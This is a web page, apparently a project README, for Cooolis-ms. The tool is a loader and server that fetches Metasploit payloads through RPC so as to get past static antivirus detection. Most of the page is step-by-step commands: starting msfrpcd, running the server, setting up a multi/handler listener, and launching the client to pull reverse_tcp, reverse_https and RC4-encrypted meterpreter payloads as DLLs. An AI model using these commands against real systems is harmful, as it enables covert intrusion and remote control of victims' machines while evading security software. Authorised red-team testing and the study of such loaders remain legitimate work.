Cooolis-ms is a server that supports Metasploit Framework RPC. It is used to work for Shellcode and PE loader, bypassing the static detection of anti-virus software to a certain extent, and allows the Cooolis-ms server to perform with the Metasploit server separate.

Loader execution process:

  1. connect to Cooolis-Server
  2. Cooolis-Server connects to Metasploit RPC server
  3. retrieve the payload and send it back to the loader

Core technologies:

Advantages of the project
  • small volume (<600KB)
  • Support all Metasploit Payload
  • Simple parameters
  • Single file
  • Support separation

You can refer to here and write your own good projects

How to install

Choice 1 > Docker deployment (recommend)



$ git clone
$ cd Cooolis-ms/Docker
$ docker-compose up -d

Default listening port:8899

Choice 2 > Source code deployment
$ git clone
$ cd Cooolis-ms
$ pip3 install -r requirements.txt
$ python3 -h

How to use

If you are deploying with Docker, please start directly from the third step.

Assuming this is my VPS:

First step, start Metasploit RPC server

Start Metasploit RPC server:

$ msfrpcd -U msf -P msf -u /api/1.0/ -a


Second step, start the Cooolis-ms server

Make it connect to RPC and listen to a port for sending payload:

$ python3 -U msf -P msf -H -p 55553 -s -v -l 8899 -S

Third step, configure Metasploit listener
msf5 > use exploit/multi/handler
msf5 > set payload windows/meterpreter/reverse_tcp
msf5 > set LHOST
msf5 > set LPORT 8876
msf5 > exploit -j

Fourth step, start the Cooolis-ms client
Cooolis-ms.exe -p windows/meterpreter/reverse_tcp -o LHOST=,LPORT=8876,Format=dll -H -P 8899

Q&A : Does it support RC4 encrypted Payload?

  • windows/meterpreter/reverse_tcp_rc4:
Cooolis-ms.exe -p windows/meterpreter/reverse_tcp_rc4 -o LHOST=,LPORT=8876,RC4PASSWORD=rc4_password,Format=dll -H -P 8899
  • windows/meterpreter_reverse_https
Cooolis-ms.exe -p windows/meterpreter_reverse_https -o LHOST=,LPORT=8876,LURI=/api/,Format=dll -H -P 8899
  • windows/meterpreter/bind_tcp_rc4
Cooolis-ms.exe -p windows/meterpreter/bind_tcp_rc4 -o RHOST=,LPORT=8876,LURI=/api/,Format=dll -H -P 8899
  • Other... self-play


  1. The -o parameter of Cooolis-ms.exe should correspond to the msf configuration.
  2. Since this project relies on the open source project MemoryModule, it can only support PAYLOAD in DLL format. Need to add Format=dll after the -o parameter.

©2021 By Cyber Sec Labs



We're not around right now. But you can send us an email and we'll get back to you, asap.


Log in with your credentials


Forgot your details?

Create Account